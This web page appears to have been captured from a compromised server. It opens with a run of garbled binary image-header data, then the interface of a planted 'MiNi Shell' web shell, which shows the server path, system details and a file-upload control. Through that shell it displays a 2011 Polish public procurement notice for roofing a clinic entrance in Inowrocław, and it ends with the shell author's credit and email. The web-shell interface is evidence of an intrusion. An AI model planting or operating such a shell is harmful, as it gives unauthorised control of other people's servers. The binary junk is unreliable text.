JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110525/127630-N-2011.html

<p class="kh_header"><b>Inowrocław: Roboty budowlane pn. Zadaszenie wejścia do Przychodni Przyszpitalnej PSZOZ w Inowrocławiu</b><br>
<b>Numer ogłoszenia: 127630 - 2011; data zamieszczenia: 25.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczny Specjalistyczny Zakład Opieki Zdrowotnej , ul. Poznańska 97, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3545587, faks 052 3574667.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pszozino.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane pn. Zadaszenie wejścia do Przychodni Przyszpitalnej PSZOZ w Inowrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  są prace związane z budową zadaszenia wejścia do Przychodni Przyszpitalnej.
2.	Szczegółowy zakres prac   określa dokumentacja techniczna(Architektura,Konstrukcja,Elektryka) specyfikacja techniczna wykonania i odbioru robót (STWiOR) oraz przedmiary ,  które  stanowią załączniki Nr  7-9a do niniejszej specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.10.00-4, 45.22.32.10-1, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnosić w kwocie :  5.000,00 zł
(słownie: pięć tysięcy złotych 00/100)
2.	Miejsce wnoszenia wadium w pieniądzu na wskazany rachunek bankowy:

     - Bank :  Kredyt Bank  S.A. O/Bydgoszcz
       Nr rachunku: 88 1500 1360 1213 6002 4430 0000 

  3. Wadium wnoszone w pieniądzu można wpłacać przelewem na wskazane konto.
  4. Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do 
      oferty. 
  5. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji 
       ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju,
       Przedsiębiorczości, należy dołączyć do oferty w formie nienaruszonego oryginału lub
       zdeponować w kasie u Zamawiającego, a kopię załączyć do oferty.
  6.  Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób
    reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego 
    (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób
    umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny
    (z podaniem imienia i nazwiska).
     Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone
      przez zamawiającego w terminie związania ofertą,  zobowiązanie gwaranta do wypłaty 
      zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 
      ustawy Prawo zamówień publicznych. 
 7.    Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert  
         tj. do dnia  09.06.2011r. godz. 9:30
 8.     Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą
         wadium w wyznaczonym terminie zostanie wykluczony z postępowania.
 9.     Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców,
         Zamawiający przekaże do banku niezwłocznie po:
      a)   wyborze najkorzystniejszej oferty, unieważnieniu postępowania o udzielenie  niniejszego zamówienia    publicznego, za wyjątkiem Wykonawcy  , którego oferta została uznana za najkorzystniejszą -z zastrzeżeniem art. 46  ust. 4 a ustawy Pzp. oraz niezwłocznie  na  wniosek Wykonawcy , który wycofał ofertę przed upływem  terminu   spływania ofert. 
      b)   zawarciu umowy w sprawie zamówienia publicznego.

10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni , że wynika to z przyczyn nie leżących  po jego stronie.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta zostanie wybrana:
 a) odmówi podpisania umowy  na warunkach określonych w ofercie,
 b) zawarcie umowy  w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn 
     leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcą w SIWZ określa się osobę fizyczną, osobę prawną albo jednostkę organizacyjną
        nie posiadającą osobowości prawnej , która ubiega się o udzielenie zamówienia publicznego ,
        złożyła ofertę lub zawarła umowę w sprawie zamówienia publicznego. 
        O udzielenie zamówienia określonego w części III SIWZ ubiegać się wykonawcy którzy:
         nie podlegają wykluczeniu na podstawie przepisów art. 24 ust. 1 i 2 ustawy Pzp ,
         spełniają warunki określone przepisami art. 22 ust. 1 pkt 1-4 ustawy Pzp ,  
         zrealizowali w okresie ostatnich 5 lat przed upływem terminu składania ofert , a jeżeli okres
         prowadzenia działalności jest krótszy - w tym okresie przynajmniej dwie roboty budowlane  
         odpowiadające rodzajem  przedmiotowi zamówienia, o wartości robót co najmniej     
         100.000,00 zł każda (słownie: sto tysięcy złotych 00/100)
         dysponują przy realizacji zamówienia minimum 1 osobą posiadającą uprawnienia budowlane 
         do kierowania robotami budowlanymi w specjalności budowlanej, wpisaną do właściwej izby 
         inżynierów budownictwa , posiadającą aktualne ubezpieczenie od odpowiedzialności cywilnej,
         są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności
        gospodarczej  związanej z przedmiotem zamówienia na kwotę minimum 80.000,00 zł 
        (słownie: osiemdziesiąt tysięcy złotych 00/100))
     Zamawiający   dokona oceny spełniania warunków na podstawie dokumentów
      dołączonych celem ich wykazania wymienionych w pkt. 9.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zrealizowali  w okresie ostatnich pięciu  lat przed upływem terminu    składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  przynajmniej dwie roboty budowlane, odpowiadające swoim rodzajem i wartością robotom budowlanym, stanowiącym przedmiot zamówienia, o wartości robót co najmniej 100.000,00 zł każda,(słownie: sto tysięcy złotych 00/100)  z podaniem ich wartości,  przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że roboty objęte wykazem, o którym  mowa wyżej, zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	wykaz osób , którymi dysponuje bądź będzie dysponował Wykonawca , posiadających uprawnienia budowlane do kierowania robotami budowlanymi , wpisanych do właściwej izby inżynierów budownictwa , posiadających aktualne ubezpieczenie od odpowiedzialności cywilnej (wg załącznika nr 4 do SIWZ) Wykonawca złoży oświadczenie że w.wym. osoby posiadają wymagane uprawnienia budowlane,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	wykaz osób , którymi dysponuje bądź będzie dysponował Wykonawca , posiadających uprawnienia budowlane do kierowania robotami budowlanymi , wpisanych do właściwej izby inżynierów budownictwa , posiadających aktualne ubezpieczenie od odpowiedzialności cywilnej (wg załącznika nr 4 do SIWZ) Wykonawca złoży oświadczenie że w.wym. osoby posiadają wymagane uprawnienia budowlane,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz  -Oferta (zał. nr 1),
b)	 dowód wniesienia wadium,
c)	dokument z którego wynika uprawnienie do podpisania oferty lub pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie wpisu z rejestru handlowego lub zaświadczenia o prowadzeniu działalności gospodarczej. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego powinno zawierać pieczęć Wykonawcy, imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis.
d)  opis części zamówienia, która zostanie powierzona podwykonawcy (jeżeli dotyczy), 
e)  w przypadku  gdy Wykonawca będzie polegać na wiedzy, doświadczeniu innych
     podmiotów przedstawi w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu
    do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu
     zamówienia,
f)  oświadczenie o udzieleniu  gwarancji i rękojmi.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Poza przypadkami określonymi w umowie zmiany umowy będą mogły wystąpić w 
następujących okolicznościach:
zaistnienia , po zawarciu umowy przypadku siły wyższej , przez którą na potrzeby 
niniejszego warunku , rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi 
prawnej:o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed 
zawarciem umowy, którego nie można uniknąć ani któremu strony nie mogły zapobiec 
przy zachowaniu należytej staranności , której nie można przypisać drugiej stronie,
            Za siłę wyższą warunkującą zmianę umowy uważać się będzie w  szczególności: powódź, 
pożar i inne klęski żywiołowe, zamieszki, strajki , ataki terrorystyczne, działania wojenne,
nagłe załamania warunków atmosferycznych , nagłe przerwy w dostawie energii 
elektrycznej, promieniowanie lub skażenia,
zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na 
realizację przedmiotu zamówienia lub świadczenia stron, 
            powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie , których nie 
            będzie można usunąć w inny sposób, a zmiana będzie  umożliwiać usunięcie rozbieżności i 
            doprecyzowanie umowy  w celu jednoznacznej interpretacji jej zapisów przez strony,
             zmiany lub innej istotnej zmiany w ilości jakiegokolwiek elementu prac objętych umową 
(dotyczy to kontraktów obmiarowych przewidujących wynagrodzenia kosztorysowe),
wystąpienia istotnych wad dokumentacji projektowej, skutkujących koniecznością 
dokonania poprawek lub uzupełnień jeżeli uniemożliwia to lub istotnie wstrzymuje 
realizację określonego rodzaju robót mających wpływ na zmianę  terminu realizacji  - 
zmianie ulegnie odpowiednio termin realizacji zamówienia ,
             zaistnienia okoliczności leżących po stronie Zamawiającego , w szczególności 
spowodowanych sytuacją finansową , zdolnościami płatniczymi lub warunkami 
organizacyjnymi bądź okolicznościami , które nie były możliwe do przewidzenia w chwili 
zawarcia umowy - zmianie mogą ulec termin realizacji umowy oraz terminy wynikające z 
harmonogramu,
albo*
f)* gdy zaistnieje inna niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna , ekonomiczna lub techniczna , za którą żadna ze stron  nie ponosi odpowiedzialności , skutkująca brakiem możliwości należytego wykonania umowy , zgodnie ze specyfikacją  istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia .
punkt f lub f* fakultatywnie. 
Powyższe postanowienia stanowią wykaz zmian, na które Zamawiający może wyrazić 
zgodę, jednocześnie nie stanowią zobowiązania do wyrażenia takiej zgody. Strona występująca z propozycją zmiany umowy, w oparciu o przedstawiony powyżej wykaz możliwych zmian umowy, zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę. Wszelkie zmiany umowy dla swej ważności wymagają formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pszozino.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczny Specjalistyczny Zakład Opieki Zdrowotnej, ul.Poznańska 97, 88-100 Inowrocław, Dział Zamówień Publicznych, budynek administracyjny pok. 02A,03.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2011 godzina 09:30, miejsce: w Sekretariacie Głównego Specjalisty ds. Techniczno- Administracyjnych -Publiczny Specjalistyczny Zakład Opieki  Zdrowotnej, ul. Poznańska 97,  88-100 Inowrocław..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com